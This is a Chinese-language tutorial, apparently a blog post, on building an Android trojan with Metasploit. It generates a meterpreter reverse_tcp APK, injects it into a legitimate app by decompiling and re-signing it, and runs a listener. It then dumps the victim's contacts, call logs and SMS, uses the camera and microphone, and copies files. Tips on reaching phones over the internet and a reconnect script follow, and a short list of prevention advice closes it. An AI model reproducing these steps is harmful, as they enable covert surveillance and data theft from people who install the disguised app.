安装msf
是什么?Metasploit Framework
什么是Metasploit?
简单来说:全球最常用的渗透测试框架,ruby语言写的
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
验证漏洞开源的工具
官网:https://www.metasploit.com/
github:https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
如果是mac环境,直接在命令行中输入
1 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ |
等待结果是
1 | # laibinzhi @ laibinzhideMacBook-Pro in ~ [19:13:23] |
在zsh配置文件下配置msf路径的环境变量,方便直接调用msf路径
1 | vim ~/.zshrc |
启用msf
1 | $ msfconsole |
如果是第一次使用,在输入上面命令的时候,会提示初始化一个数据库,选择y
1 | Would you like to use and setup a new database (recommended)? y |
然后设置用户名和密码,这里都设置为msf
1 | [?] Initial MSF web service account username? [opposec]: msf |
然后提示创建成功
在浏览器打开 https://localhost:5443/api/v1/auth/account
输入刚刚的用户名密码,登录进去。
制作木马程序
使用msfvenom工具来创建有效载荷APK文件(木马)
1 | $ msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.101 LPORT=5555 R > /Users/laibinzhi/temp/msf/mua.apk |
注意:
10.0.0.101 是电脑的ip地址,可以通过下面命令行获取
1
ifconfig | grep "inet"
端口号5555,使用这个就好
后面输出的是apk后缀的木马文件
安装木马程序
本例子使用最简单的方式安装到手机上,安装成功后,他出现在桌面上,只有一个图标。如果是常见的就是把它反编译,把它注入到现有app中,这样就比较隐秘。
反编译注入
反编译
1
2apktool d normal.apk
apktool d mua.apk在目标MainActivityOnCreate插入
1
2invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
将木马mua文件夹中的metasploit整个目录放到目标文件下com下
把木马AndroidManifest文件的所有权限复制到目标的AndroidManifest中
重新构建apk
1 | apktool b normal -o new.apk |
6.签名
1 | jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA new.apk androiddebugkey |
监听手机
以此输入下列命令,比较注意的是这些参数的值跟之前msfvenom使用的参数一样。url和端口号
1 | //加载模块 |
最后执行下面命令正在监听
1 | exploit |
1 | msf6 exploit(multi/handler) > exploit |
这里表示一致在监听,如果现在用户点击了那个木马程序,那么就会建立一个meterpreter连接。
1 | msf6 exploit(multi/handler) > exploit |
建立连接之后,我们就可以实现电脑控制手机了,下面就是一些常见的命令行
1 | meterpreter > help |
体验
获取手机通讯录
1 | meterpreter > dump_contacts |
在电脑目录多了一个contacts_dump_20200917195142.txt的文件,打开如图所示
获取手机通话记录
1 | meterpreter > dump_calllog |
在电脑目录多了一个calllog_dump_20200917195408.txt的文件,打开如图所示
获取手机短信
1 | meterpreter > dump_sms |
在电脑目录多了一个sms_dump_20200917195455.txt的文件,打开如图所示
拍照
获取摄像头列表
1 | meterpreter > webcam_list |
表示有两个摄像头,前置和后置,如果想要用前置摄像头拍
1 | meterpreter > webcam_snap -i 2 |
在电脑目录多了一个VEduPltE.jpeg的图片,打开如图所示
同样的,后置摄像头就把2改为1
录像
支持实时的一帧帧的照片组成的视频,下面是一些配置参数
1 |
|
1 | meterpreter > webcam_stream -d 3000 -i 2 |
在电脑浏览器打开一个网页显示,如图
窃听
1 | meterpreter > record_mic -d 10 |
同样在电脑桌面多了一个wav音频文件,为10秒钟的窃听数据。
文件的上传和下载
1 | meterpreter > search -d /storage/emulated/0/DCIM/Camera -f *.jpg |
通过search命令,获取手机的内容,比如图片
再通过download和upload命令,可以把手机上面的照片下载
windows?
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.101 LPORT=5555 x > /Users/laibinzhi/Downloads/mua.exe |
怎么外网访问监听?
1.使用vps转发来达到上线目的。
2.使用Ngrok等工具做内网穿透。
掉线问题
自写守护脚本,用shell运行。
1 | # !/bin/bash |
预防
- 请勿随意连上陌生wifi
- 下载应用程序要在官方渠道下载
- 手机不要root
- 手机app授权要谨慎
- 打包应用程序的时候安装包加固以免被不法分子反编译